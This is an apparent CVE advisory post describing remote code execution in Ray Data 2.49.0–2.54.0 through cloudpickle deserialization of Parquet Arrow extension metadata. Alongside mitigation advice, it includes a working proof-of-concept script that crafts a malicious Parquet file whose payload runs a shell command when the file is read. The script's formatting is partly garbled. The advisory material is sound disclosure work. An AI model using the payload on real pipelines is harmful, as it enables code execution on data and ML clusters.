Ray Data, Remote Code Execution via Parquet Arrow Extension Type Deserialization (Critical)

Listen to this Post

How the CVE works (technical details):

Ray Data registers three custom Arrow extension types (ray.data.arrow_tensor, ray.data.arrow_tensor_v2, ray.data.arrow_variable_shaped_tensor) globally in PyArrow at module load time. When PyArrow reads a Parquet file containing any of these extension type names in its schema, it automatically calls the `__arrow_ext_deserialize__` method on the field’s metadata bytes. Ray’s implementation of this method passes the `serialized` bytes (taken directly from the Parquet file’s `ARROW:extension:metadata` field) to _deserialize_with_fallback(). That function first tries `cloudpickle.loads(serialized)` – an unsafe deserialization primitive – before falling back to JSON. A crafted Parquet file can embed a cloudpickle payload that executes arbitrary code during schema parsing, before any row data is read. The vulnerability was reintroduced in July 2025 via PR 54831 (commit f6d21db1a4), affecting Ray versions 2.49.0 through 2.54.0. All three extension types follow the same call chain to cloudpickle.loads(). The existing mitigation (check_for_legacy_tensor_type()) only blocks old PyExtensionType-based types, not the current ones, and runs after PyArrow has already deserialized the schema – so code execution occurs first. The attack requires no network access; a malicious Parquet file from cloud storage, HuggingFace, or a shared filesystem triggers RCE when read by any Ray Data pipeline or even by `pyarrow.parquet.read_table()` or `pandas.read_parquet()` due to global registration.

dailycve form:

Platform: Ray Data
Version: 2.49.0-2.54.0
Vulnerability: RCE via deserialization
Severity: Critical
date: March 17,2026

Prediction: Patch by April2026

What Undercode Say:

Create malicious Parquet with cloudpickle payload
cat > craft_parquet.py << 'EOF'
import cloudpickle, pyarrow as pa, pyarrow.parquet as pq
class Trigger:
def <strong>reduce</strong>(self):
return (eval, (f"(<strong>import</strong>('os').system('id > /tmp/pwned'), (1,))[bash]",))
storage_type = pa.list_(pa.int64())
schema = pa.schema([pa.field("tensor", storage_type, metadata={
b"ARROW:extension:name": b"ray.data.arrow_tensor",
b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
})])
pq.write_table(pa.Table.from_arrays([pa.array([[1,2,3],[4,5,6]], type=storage_type)], schema=schema), "evil.parquet")
EOF
uv run --with 'cloudpickle,pyarrow' python craft_parquet.py
Trigger RCE via Ray Data read
rm -f /tmp/pwned
uv run --with 'ray[bash]' python -c "import ray.data; ray.data.read_parquet('evil.parquet')"
cat /tmp/pwned shows uid/gid

Exploit:

Attacker crafts a Parquet file where a column’s `ARROW:extension:metadata` contains a cloudpickle-serialized object whose `__reduce__` returns a call to `os.system()` or eval(). The file is placed on any location Ray reads (local disk, S3, HuggingFace dataset). When Ray Data (or any PyArrow process with Ray’s types registered) parses the schema, `cloudpickle.loads()` executes the payload immediately – no row reading required.

Protection from this CVE:

Upgrade Ray to a patched version (if available) or apply the suggested fix: replace `cloudpickle.loads()` with `json.loads()` in `_deserialize_with_fallback()` (ray/data/_internal/tensor_extensions/arrow.py:84-96). Set environment variable `RAY_DATA_AUTOLOAD_PYEXTENSIONTYPE=0` to block legacy types, though this does not fully prevent the current issue. Avoid reading untrusted Parquet files; use a separate service to sanitize Parquet schemas by stripping unknown extension types.

Impact:

Full remote code execution as the Ray worker process user. Compromises the entire Ray cluster node. Data confidentiality, integrity, and availability are lost. Attackers can pivot, install backdoors, or exfiltrate data. No authentication required – only a malicious Parquet file read by a vulnerable Ray Data pipeline. HuggingFace datasets, multi-tenant ML platforms, and compromised data pipelines are realistic attack vectors.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top